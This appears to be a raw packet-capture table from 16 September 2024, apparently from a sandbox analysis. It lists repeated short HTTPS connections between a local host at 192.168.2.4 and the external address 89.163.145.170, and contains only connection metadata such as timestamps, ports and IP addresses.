Sep 16, 2024 12:22:35.670917034 CEST | 443 | 49744 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:35.851197004 CEST | 443 | 49744 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:35.851360083 CEST | 443 | 49744 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:35.851453066 CEST | 49744 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:35.858478069 CEST | 49744 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:35.858478069 CEST | 49744 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:35.858537912 CEST | 443 | 49744 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:35.858551979 CEST | 443 | 49744 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:35.943855047 CEST | 49747 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:35.943886995 CEST | 443 | 49747 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:35.943944931 CEST | 49747 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:35.944114923 CEST | 49747 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:35.944132090 CEST | 443 | 49747 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:36.560172081 CEST | 443 | 49747 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:36.560672998 CEST | 49747 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:36.560714960 CEST | 443 | 49747 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:36.564439058 CEST | 49747 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:36.564446926 CEST | 443 | 49747 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:36.815779924 CEST | 443 | 49747 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:36.815931082 CEST | 443 | 49747 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:36.816190958 CEST | 49747 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:36.953752995 CEST | 49747 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:36.953788996 CEST | 443 | 49747 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:36.953804970 CEST | 49747 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:36.953814030 CEST | 443 | 49747 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:39.033648014 CEST | 49751 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:39.033704042 CEST | 443 | 49751 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:39.033926010 CEST | 49751 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:39.034209013 CEST | 49751 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:39.034226894 CEST | 443 | 49751 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:39.740395069 CEST | 443 | 49751 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:39.741015911 CEST | 49751 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:39.741051912 CEST | 443 | 49751 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:39.744983912 CEST | 49751 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:39.744990110 CEST | 443 | 49751 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:39.995671988 CEST | 443 | 49751 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:39.995739937 CEST | 443 | 49751 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:39.996448040 CEST | 49751 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:39.996536016 CEST | 49751 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:39.996562004 CEST | 443 | 49751 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:39.996575117 CEST | 49751 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:39.996582031 CEST | 443 | 49751 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:41.033190966 CEST | 49753 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:41.033236980 CEST | 443 | 49753 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:41.033345938 CEST | 49753 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:41.033543110 CEST | 49753 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:41.033557892 CEST | 443 | 49753 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:41.674643993 CEST | 443 | 49753 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:41.675147057 CEST | 49753 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:41.675167084 CEST | 443 | 49753 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:41.675869942 CEST | 49753 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:41.675875902 CEST | 443 | 49753 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:41.936748981 CEST | 443 | 49753 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:41.936820984 CEST | 443 | 49753 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:41.937092066 CEST | 49753 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:41.937891006 CEST | 49753 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:41.937891006 CEST | 49753 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:41.937925100 CEST | 443 | 49753 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:41.937936068 CEST | 443 | 49753 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:44.064210892 CEST | 49756 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:44.064265966 CEST | 443 | 49756 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:44.064349890 CEST | 49756 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:44.064512014 CEST | 49756 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:44.064524889 CEST | 443 | 49756 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:44.680888891 CEST | 443 | 49756 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:44.681658030 CEST | 49756 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:44.681669950 CEST | 443 | 49756 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:44.682519913 CEST | 49756 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:44.682526112 CEST | 443 | 49756 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:44.937464952 CEST | 443 | 49756 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:44.937527895 CEST | 443 | 49756 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:44.937582016 CEST | 49756 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:44.938342094 CEST | 49756 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:44.938357115 CEST | 443 | 49756 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:44.938373089 CEST | 49756 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:44.938380003 CEST | 443 | 49756 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:47.170778990 CEST | 49759 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:47.170821905 CEST | 443 | 49759 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:47.171081066 CEST | 49759 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:47.171309948 CEST | 49759 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:47.171324015 CEST | 443 | 49759 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:47.811216116 CEST | 443 | 49759 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:47.811840057 CEST | 49759 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:47.811862946 CEST | 443 | 49759 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:47.812583923 CEST | 49759 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:47.812588930 CEST | 443 | 49759 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:48.073926926 CEST | 443 | 49759 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:48.074002028 CEST | 443 | 49759 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:48.074131012 CEST | 49759 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:48.074503899 CEST | 49759 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:48.074523926 CEST | 443 | 49759 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:48.074534893 CEST | 49759 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:48.074539900 CEST | 443 | 49759 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:49.615359068 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:49.615405083 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:49.615511894 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:49.615864992 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:49.615878105 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.235726118 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.236469030 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.236480951 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.237199068 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.237204075 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.494885921 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.494976997 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.495039940 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.495455980 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.495471954 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:50.495481968 CEST | 49760 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:50.495487928 CEST | 443 | 49760 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:52.642353058 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:52.642402887 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:52.642499924 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:52.642839909 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:52.642859936 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.264830112 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.265551090 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.265571117 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.266444921 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.266453028 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.522586107 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.522660971 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.522803068 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.523164034 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.523164034 CEST | 49761 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:53.523194075 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:53.523207903 CEST | 443 | 49761 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:54.729829073 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:54.729871035 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:54.729942083 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:54.730534077 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:54.730549097 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.351984024 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.352907896 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.352922916 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.353666067 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.353672981 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.609446049 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.609515905 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.609595060 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.609930992 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.609945059 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:55.609963894 CEST | 49762 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:55.609968901 CEST | 443 | 49762 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:56.735512972 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:56.735558987 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:56.735640049 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:56.735784054 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:56.735793114 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.367954969 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.368434906 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.368447065 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.369184017 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.369189978 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.628643990 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.628705978 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.628774881 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.629472017 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.629492998 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:57.629530907 CEST | 49763 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:57.629538059 CEST | 443 | 49763 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:58.820679903 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:58.820739031 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:58.820821047 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:58.820966959 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:58.820995092 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.555695057 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.556431055 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.556451082 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.557182074 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.557193995 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.817446947 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.817507982 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.817574024 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.817989111 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.818015099 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:22:59.818038940 CEST | 49764 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:22:59.818053961 CEST | 443 | 49764 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.033159018 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.033198118 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.033288956 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.033490896 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.033503056 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.651741982 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.652282000 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.652309895 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.653146982 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.653156042 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.908324957 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.908385992 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.908607006 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.908909082 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.908932924 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:03.908947945 CEST | 49765 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:03.908956051 CEST | 443 | 49765 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:06.423160076 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:06.423207998 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:06.423326015 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:06.423470020 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:06.423487902 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.052336931 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.052758932 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.052772999 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.053405046 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.053411007 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.312895060 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.312958002 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.313056946 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.313744068 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.313760996 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:07.313807964 CEST | 49766 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:07.313815117 CEST | 443 | 49766 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:10.454354048 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:10.454452038 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:10.454622984 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:10.454772949 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:10.454806089 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.178112984 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.178807974 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.178886890 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.179599047 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.179614067 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.437993050 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.438066959 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.438148022 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.438632965 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.438672066 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:11.438688993 CEST | 49767 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:11.438704014 CEST | 443 | 49767 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:13.493233919 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:13.493283987 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:13.493376017 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:13.493526936 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:13.493542910 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.116096020 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.117897987 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.117933035 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.119107008 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.119113922 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.374258995 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.374321938 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.374375105 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.374835014 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.374855995 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:14.374869108 CEST | 49768 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:14.374874115 CEST | 443 | 49768 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:16.539326906 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:16.539438009 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:16.539525986 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:16.539701939 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:16.539737940 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.182655096 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.184565067 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.184628963 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.191162109 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.191175938 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.444603920 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.444678068 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.444755077 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.445174932 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.445203066 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:17.445213079 CEST | 49770 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:17.445220947 CEST | 443 | 49770 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:19.556683064 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:19.556747913 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:19.556827068 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:19.556977987 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:19.557005882 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.254081964 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.296432972 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.412409067 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.412437916 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.493438005 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
Sep 16, 2024 12:23:20.493467093 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.670073032 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.670152903 CEST | 443 | 49771 | 89.163.145.170 | 192.168.2.4 |
Sep 16, 2024 12:23:20.670216084 CEST | 49771 | 443 | 192.168.2.4 | 89.163.145.170 |
